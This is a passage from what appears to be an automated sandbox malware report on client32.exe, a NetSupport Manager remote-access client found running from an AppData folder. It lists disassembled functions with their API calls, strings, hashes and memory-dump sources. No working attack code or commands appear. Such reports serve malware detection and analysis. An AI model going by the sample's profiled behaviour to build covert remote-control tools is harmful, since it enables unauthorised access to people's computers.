                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                                              • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                              • API String ID: 2579639479-1136101629
                                                                              • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                              • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                              • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                              • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                              Function 11032020 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf
                                                                              • String ID: %s%s%s.bin$134349$_HF$_HW$_SW
                                                                              • API String ID: 2111968516-3092085523
                                                                              • Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                              • Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
                                                                              • Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                              • Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2
                                                                              Function 6EF06940 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 166COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 6EF06950
                                                                                • Part of subcall function 6EF07BE0: _memset.LIBCMT ref: 6EF07BFF
                                                                                • Part of subcall function 6EF07BE0: _strncpy.LIBCMT ref: 6EF07C0B
                                                                                • Part of subcall function 6EEFA4E0: EnterCriticalSection.KERNEL32(6EF3B898,00000000,?,?,?,6EEFDA7F,?,00000000), ref: 6EEFA503
                                                                                • Part of subcall function 6EEFA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6EEFA568
                                                                                • Part of subcall function 6EEFA4E0: Sleep.KERNEL32(00000000,?,6EEFDA7F,?,00000000), ref: 6EEFA581
                                                                                • Part of subcall function 6EEFA4E0: LeaveCriticalSection.KERNEL32(6EF3B898,00000000), ref: 6EEFA5B3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                              • String ID: 1.2$Channel$Client$Publish %d pending services
                                                                              • API String ID: 1112461860-1140593649
                                                                              • Opcode ID: 2701c211c89926be549d4a74f16b42e8aa7c880a4a3eabb74326359c50cb8b57
                                                                              • Instruction ID: c1465eae73649a312680734864cd5dce2da1fb968b2cfb14790cbb5f7278ccf7
                                                                              • Opcode Fuzzy Hash: 2701c211c89926be549d4a74f16b42e8aa7c880a4a3eabb74326359c50cb8b57
                                                                              • Instruction Fuzzy Hash: 3A511A71A34666CFEF20DFF4D870B9977A6AB01308F25052DE8518BA81E731D485D7E1
                                                                              Function 11103630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                              • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                              • RegisterClassA.USER32(?), ref: 111036EF
                                                                              • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                              • String ID: NSMDesktopWnd
                                                                              • API String ID: 2669163067-206650970
                                                                              • Opcode ID: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                              • Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
                                                                              • Opcode Fuzzy Hash: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                              • Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94
                                                                              Function 11145F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                              • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                              • API String ID: 47109696-3245241687
                                                                              • Opcode ID: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                              • Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
                                                                              • Opcode Fuzzy Hash: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                              • Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
                                                                              Function 111121E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
                                                                                • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 11112288
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                              • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                              • API String ID: 806825551-1858614750
                                                                              • Opcode ID: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                              • Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
                                                                              • Opcode Fuzzy Hash: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                              • Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390
                                                                              Function 11144DD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                              • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
                                                                              • ResetEvent.KERNEL32(00000268), ref: 11144E39
                                                                              • SetEvent.KERNEL32(00000268), ref: 11144E4F
                                                                              • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                              • String ID: MiniDump
                                                                              • API String ID: 1494854734-2840755058
                                                                              • Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                              • Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
                                                                              • Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                              • Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1
                                                                              Function 6EEF8E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 6EEF5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6EEF5014
                                                                                • Part of subcall function 6EEF5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6EEF8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6EEF5034
                                                                              • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6EEF8EAE
                                                                              • FreeLibrary.KERNEL32(?), ref: 6EEF8EBF
                                                                                • Part of subcall function 6EEF2420: _strrchr.LIBCMT ref: 6EEF242E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressChangeCloseFileFindFreeLibraryModuleNameNotificationProc_strrchr
                                                                              • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                              • API String ID: 4066820201-3459472706
                                                                              • Opcode ID: 96048a4f7c3b25440f5215bc21da5e52c0759f2a3ffb0f6bd820d8e0d38b2787
                                                                              • Instruction ID: a5d8bcb91fcb491d665c84d88cabf6b028f70429786fea055e96c3787ab07380
                                                                              • Opcode Fuzzy Hash: 96048a4f7c3b25440f5215bc21da5e52c0759f2a3ffb0f6bd820d8e0d38b2787
                                                                              • Instruction Fuzzy Hash: 0811CB71A10116DBEF208AD2DC61BEEB369AF55305F100459DE09A7340FB719946CBB5
                                                                              Function 111479B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
                                                                              • wsprintfA.USER32 ref: 11147A16
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                              • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                              • API String ID: 1985783259-2296142801
                                                                              • Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                              • Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
                                                                              • Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                              • Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
                                                                              Function 111101B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • _memset.LIBCMT ref: 11110207
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                              • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                              • API String ID: 3234921582-2664294811
                                                                              • Opcode ID: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
                                                                              • Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
                                                                              • Opcode Fuzzy Hash: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
                                                                              • Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
                                                                              Function 111466B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75A78400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                              • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
                                                                              • FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                              • String ID: SetProcessDpiAwareness$shcore.dll
                                                                              • API String ID: 1108920153-1959555903
                                                                              • Opcode ID: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                              • Instruction ID: b4913e853cd1401fb26aad2e9137c069c6cdc321efb83b495f2c8eb55c4c44ed
